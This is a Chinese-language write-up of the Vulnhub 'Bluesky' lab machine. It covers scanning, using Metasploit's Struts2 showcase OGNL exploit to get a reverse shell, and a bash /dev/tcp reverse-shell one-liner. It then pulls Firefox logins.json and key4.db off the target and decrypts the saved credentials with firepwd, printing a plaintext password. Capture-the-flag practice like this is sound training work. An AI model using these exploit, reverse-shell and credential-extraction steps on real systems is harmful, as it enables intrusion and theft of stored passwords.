首页 > 其他分享 >Vulnhub Bluesky靶机解题详细过程

Vulnhub Bluesky靶机解题详细过程

时间:2022-11-14 12:35:45浏览次数:65  
标签:multi http kali 56.115 192.168 exploit Vulnhub 靶机 Bluesky

Bluesky

识别目标主机IP地址

该靶机存在无法从VirtualBox自动获取IP的问题,解决过程见本人另文,此处不再赘述。

┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ sudo netdiscover -i eth
Currently scanning: 192.168.59.0/16   |   Screen View: Unique Hosts                                                                          
                                                                                                                                              
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                             
 192.168.56.100  08:00:27:81:a1:ab      1      60  PCS Systemtechnik GmbH                                                                     
 192.168.56.115  08:00:27:47:f4:47      1      60  PCS Systemtechnik GmbH                                                                     


利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.115

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.115 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-13 21:55 EST
Nmap scan report for localhost (192.168.56.115)
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 19:45:ec:5c:59:46:c8:26:b5:a3:30:d9:2f:79:ac:85 (RSA)
|   256 18:d1:aa:64:f7:f3:6f:8c:91:82:09:57:0f:07:d2:d2 (ECDSA)
|_  256 8e:50:a9:c7:1b:23:e2:68:56:0f:fa:59:2a:0a:e0:3e (ED25519)
8080/tcp open  http    Apache Tomcat 9.0.40
|_http-title: Apache Tomcat/9.0.40
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 08:00:27:47:F4:47 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.84 seconds

Get Access

目标主机有两个开放端口22(SSH服务)、8080(HTTP服务),由于SSH服务没有可利用的漏洞,接下来主要围绕HTTP服务展开信息收集:

利用Kali LInux自带浏览器访问8080端口,返回Tomcat默认页面:

┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ curl http://192.168.56.115:8080/robots.txt       
<!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;robots.txt] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.40</h3></body></html>    
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ gobuster dir -u http://192.168.56.115:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.115:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/13 21:59:50 Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]
/http%3A%2F%2Fwww     (Status: 400) [Size: 804]
/http%3A%2F%2Fyoutube (Status: 400) [Size: 804]
/http%3A%2F%2Fblogs   (Status: 400) [Size: 804]
/http%3A%2F%2Fblog    (Status: 400) [Size: 804]
/**http%3A%2F%2Fwww   (Status: 400) [Size: 804]
/External%5CX-News    (Status: 400) [Size: 795]
/http%3A%2F%2Fcommunity (Status: 400) [Size: 804]
/http%3A%2F%2Fradar   (Status: 400) [Size: 804]
/http%3A%2F%2Fjeremiahgrossman (Status: 400) [Size: 804]
/http%3A%2F%2Fweblog  (Status: 400) [Size: 804]
/http%3A%2F%2Fswik    (Status: 400) [Size: 804]
===============================================================
2022/11/13 22:00:43 Finished
===============================================================

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ dirb http://192.168.56.115:8080

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Nov 13 22:39:01 2022
URL_BASE: http://192.168.56.115:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.115:8080/ ----
+ http://192.168.56.115:8080/docs (CODE:302|SIZE:0)                                                                                           
+ http://192.168.56.115:8080/examples (CODE:302|SIZE:0)                                                                                       
+ http://192.168.56.115:8080/favicon.ico (CODE:200|SIZE:21630)                                                                                
+ http://192.168.56.115:8080/host-manager (CODE:302|SIZE:0)                                                                                   
+ http://192.168.56.115:8080/manager (CODE:302|SIZE:0)                                                                                        
                                                                                                                                              
-----------------
END_TIME: Sun Nov 13 22:39:04 2022
DOWNLOADED: 4612 - FOUND: 5
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ curl http://192.168.56.115:8080/manager/  
                                                   

目录扫描虽然识别出/manager/,但是返回该目录没有结果。

查了一下其他人的做法,说该靶机的struts存在漏洞

Struts2:是apache项目下的一个web 框架

漏洞涉及Struts2.0及以上的版本,是一个远程命令执行漏洞和开放重定向漏洞。利用漏洞,黑客可发起远程攻击,不但可以窃取网站数据信息,甚至还可取得网站服务器控制权

奇怪,前面目录扫描并没有扫描出struts2

msf6 > search struts

Matching Modules
================

   #   Name                                                     Disclosure Date  Rank       Check  Description
   -   ----                                                     ---------------  ----       -----  -----------
   0   exploit/multi/http/struts_default_action_mapper          2013-07-02       excellent  Yes    Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
   1   exploit/multi/http/struts_dev_mode                       2012-01-06       excellent  Yes    Apache Struts 2 Developer Mode OGNL Execution
   2   exploit/multi/http/struts2_multi_eval_ognl               2020-09-14       excellent  Yes    Apache Struts 2 Forced Multi OGNL Evaluation
   3   exploit/multi/http/struts2_namespace_ognl                2018-08-22       excellent  Yes    Apache Struts 2 Namespace Redirect OGNL Injection
   4   exploit/multi/http/struts2_rest_xstream                  2017-09-05       excellent  Yes    Apache Struts 2 REST Plugin XStream RCE
   5   exploit/multi/http/struts2_code_exec_showcase            2017-07-07       excellent  Yes    Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution
   6   exploit/multi/http/struts_code_exec_classloader          2014-03-06       manual     No     Apache Struts ClassLoader Manipulation Remote Code Execution
   7   exploit/multi/http/struts_dmi_exec                       2016-04-27       excellent  Yes    Apache Struts Dynamic Method Invocation Remote Code Execution
   8   exploit/multi/http/struts2_content_type_ognl             2017-03-07       excellent  Yes    Apache Struts Jakarta Multipart Parser OGNL Injection
   9   exploit/multi/http/struts_code_exec_parameters           2011-10-01       excellent  Yes    Apache Struts ParametersInterceptor Remote Code Execution
   10  exploit/multi/http/struts_dmi_rest_exec                  2016-06-01       excellent  Yes    Apache Struts REST Plugin With Dynamic Method Invocation Remote Code Execution
   11  exploit/multi/http/struts_code_exec                      2010-07-13       good       No     Apache Struts Remote Command Execution
   12  exploit/multi/http/struts_code_exec_exception_delegator  2012-01-06       excellent  No     Apache Struts Remote Command Execution
   13  exploit/multi/http/struts_include_params                 2013-05-24       great      Yes    Apache Struts includeParams Remote Code Execution
   14  auxiliary/scanner/http/log4shell_scanner                 2021-12-09       normal     No     Log4Shell HTTP Scanner


Interact with a module by name or index. For example info 14, use 14 or use auxiliary/scanner/http/log4shell_scanner

msf6 > use  exploit/multi/http/struts2_code_exec_showcase

[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options

Module options (exploit/multi/http/struts2_code_exec_showcase):

   Name       Current Setting                            Required  Description
   ----       ---------------                            --------  -----------
   POSTPARAM  name                                       yes       The HTTP POST parameter
   Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                                   i/Using-Metasploit
   RPORT      8080                                       yes       The target port (TCP)
   SSL        false                                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/integration/saveGangste  yes       The path to a struts application action
              r.action
   VHOST                                                 no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf6 exploit(multi/http/struts2_code_exec_showcase) > set RHOSTS 192.168.56.115
RHOSTS => 192.168.56.115
msf6 exploit(multi/http/struts2_code_exec_showcase) > set LHOST 192.168.56.107
LHOST => 192.168.56.107
msf6 exploit(multi/http/struts2_code_exec_showcase) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/struts2_code_exec_showcase) > exploit

[*] Started reverse TCP handler on 192.168.56.107:5555 
[+] Command executed


msf6 exploit(multi/http/struts2_code_exec_showcase) > show options 

Module options (exploit/multi/http/struts2_code_exec_showcase):

   Name       Current Setting                            Required  Description
   ----       ---------------                            --------  -----------
   POSTPARAM  name                                       yes       The HTTP POST parameter
   Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.115                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                                   i/Using-Metasploit
   RPORT      8080                                       yes       The target port (TCP)
   SSL        false                                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/integration/saveGangste  yes       The path to a struts application action
              r.action
   VHOST                                                 no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.107   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload /usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/hrr_rb_ssh-0.4.2/lib/hrr_rb_ssh/transport/server_host_key_algorithm/ecdsa_sha2_nistp256.rb:11: warning: already initialized constant HrrRbSsh::Transport::ServerHostKeyAlgorithm::EcdsaSha2Nistp256::NAME

msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload cmd/unix/
cmd/unix/reverse_tclsh
set payload cmd/unix/python/pingback_bind_tcp             set payload cmd/unix/reverse_zsh
         
msf6 exploit(multi/http/struts2_code_exec_showcase) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(multi/http/struts2_code_exec_showcase) > show options 

Module options (exploit/multi/http/struts2_code_exec_showcase):

   Name       Current Setting                            Required  Description
   ----       ---------------                            --------  -----------
   POSTPARAM  name                                       yes       The HTTP POST parameter
   Proxies                                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.56.115                             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                                                   i/Using-Metasploit
   RPORT      8080                                       yes       The target port (TCP)
   SSL        false                                      no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-showcase/integration/saveGangste  yes       The path to a struts application action
              r.action
   VHOST                                                 no        HTTP server virtual host


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.56.107   yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf6 exploit(multi/http/struts2_code_exec_showcase) > run

[*] Started reverse TCP handler on 192.168.56.107:5555 
[*] Command shell session 1 opened (192.168.56.107:5555 -> 192.168.56.115:57714) at 2022-11-13 22:51:19 -0500
id
[-] Exploit aborted due to failure: unknown: Exploit failed.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/struts2_code_exec_showcase) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf6 exploit(multi/http/struts2_code_exec_showcase) > shell
[-] Unknown command: shell
msf6 exploit(multi/http/struts2_code_exec_showcase) > sessions 

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.56.107:5555 -> 192.168.56.115:57714 (192.168.56.115)

msf6 exploit(multi/http/struts2_code_exec_showcase) > sessions 1
[*] Starting interaction with 1...

id
uid=1000(minhtuan) gid=1000(minhtuan) groups=1000(minhtuan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
bash -c 'bash -i >& /dev/tcp/192.168.56.107/6666 0>&1'


得到shell以后,由于担心不稳定,再另行spawn一个shell

└─$ sudo nc -nlvp 6666                                         
[sudo] password for kali: 
listening on [any] 6666 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.115] 37544
bash: cannot set terminal process group (648): Inappropriate ioctl for device
bash: no job control in this shell
minhtuan@ubuntu:~$ id
id
uid=1000(minhtuan) gid=1000(minhtuan) groups=1000(minhtuan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
minhtuan@ubuntu:~$ ls
ls
Desktop
Documents
Downloads
Music
myWebApp
Pictures
Public
struts2
Templates
user.txt
velocity.log
Videos
minhtuan@ubuntu:~$ cat user.txt
cat user.txt
Try your best, you have passed the first challenge, and the last one is for you, root me!
minhtuan@ubuntu:~$ 

提权

在网上找到firefox浏览器存储用户名密码的文件是logins.json(版本号小于等于32.0)或者signons.sqlite

minhtuan@ubuntu:~/.mozilla$ find / -name logins.json 2>/dev/null
find / -name logins.json 2>/dev/null
/home/minhtuan/.mozilla/firefox/fvbljmev.defaultgelease/logins.jsong

该文件是加密的,需要用工具破解

┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ git clone https://github.com/lclevy/firepwd.git
Cloning into 'firepwd'...
remote: Enumerating objects: 88, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 88 (delta 2), reused 3 (delta 0), pack-reused 80
Receiving objects: 100% (88/88), 239.08 KiB | 383.00 KiB/s, done.
Resolving deltas: 100% (41/41), done.
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ ls                
firepwd  nmap_full_scan
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ cd firepwd        
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ ls
firepwd.py  LICENSE  mozilla_db  mozilla_pbe.pdf  mozilla_pbe.svg  readme.md  requirements.txt
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ pip -r requirements.txt 

Usage:   
  pip <command> [options]

no such option: -r
                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ pip install -r requirements.txt 


在靶机启用http,将logins.json以及key4.db下载到Kali Linux

<firefox/fvbljmev.default-release$ python3 -m http.server                    
Serving HTTP on 0.0.0.0 port 8000 ...


┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ wget http://192.168.56.115:8000/logins.json     
--2022-11-13 23:08:51--  http://192.168.56.115:8000/logins.json
Connecting to 192.168.56.115:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 660 [application/json]
Saving to: ‘logins.json’

logins.json                         100%[==================================================================>]     660  --.-KB/s    in 0.02s   

2022-11-13 23:08:51 (35.8 KB/s) - ‘logins.json’ saved [660/660]

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ wget http://192.168.56.115:8000/key4.db    
--2022-11-13 23:08:57--  http://192.168.56.115:8000/key4.db
Connecting to 192.168.56.115:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 294912 (288K) [application/octet-stream]
Saving to: ‘key4.db’

key4.db                             100%[==================================================================>] 288.00K  --.-KB/s    in 0.04s   

2022-11-13 23:08:57 (7.60 MB/s) - ‘key4.db’ saved [294912/294912]

                                                                                                                                               
┌──(kali㉿kali)-[~/Vulnhub/Bluesky]
└─$ ls
firepwd  key4.db  logins.json  nmap_full_scan

┌──(kali㉿kali)-[~/Vulnhub/Bluesky/firepwd]
└─$ python firepwd.py
globalSalt: b'5932ff5878417b64a4049f8d9ce7b3ab247fde15'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'5a7912074f9ddf6b381316126704a5479794dcf75aca047f45e2b54b3f0e6d79'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'7366afcc6bf9cacc1fa25fa3961a'
       }
     }
   }
   OCTETSTRING b'1c74cace1e1e37252aea0d28aafb2399'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'c0c32a0189ed3b0db160c739a54c821da4fd5572d3ee79cb36533bc7d11a49d0'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'4b11e722902bc3a1bf51be57de22'
       }
     }
   }
   OCTETSTRING b'c6158b0d1e7a81ce468f9d24624daa581ee8095b6f4596242ef2dbf30b300b5b'
 }
clearText b'540b76c41a46b9dcecc4c15449c785011546bcf84cfe9b700808080808080808'
decrypting login/password pairs
 https://twitter.com:b'minhtuan',b'skysayohyeah'

得到用户名和密码: minhtuan以及skysayohyeah


标签:multi,http,kali,56.115,192.168,exploit,Vulnhub,靶机,Bluesky
From: https://www.cnblogs.com/jason-huawen/p/16888645.html

相关文章

  • Vulnhub Victim 01靶机解题过程
    Victim01识别目标主机IP地址......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • Vulnhub Sundown靶机解题过程
    Sundown识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Sundown]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......
  • Vulnhub So Simple 1靶机解题过程
    SoSimple1识别目标主机IP地址┌──(kali㉿kali)-[~]└─$sudonetdiscover-ieth1......
  • Vulnhub ReconForce靶机解题详细过程
    ReconForce识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/ReconForce]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:......
  • vulnhub靶场之DOUBLETROUBLE: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DOUBLETROUBLE:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/doubletrouble/doubl......
  • Vulnhub Potato靶机解题过程
    Potato识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Potato]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.85.0/16|ScreenView:UniqueHosts......
  • Vulnhub OSCP靶机解题过程
    OSCP识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/OSCP]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • 靶机: EvilBox---One
    靶机:EvilBox---One准备工作靶机地址:https://download.vulnhub.com/evilbox/EvilBox---One.ovaMD5校验:c3a65197b891713731e6bb791d7ad259cmd进行校验:certu......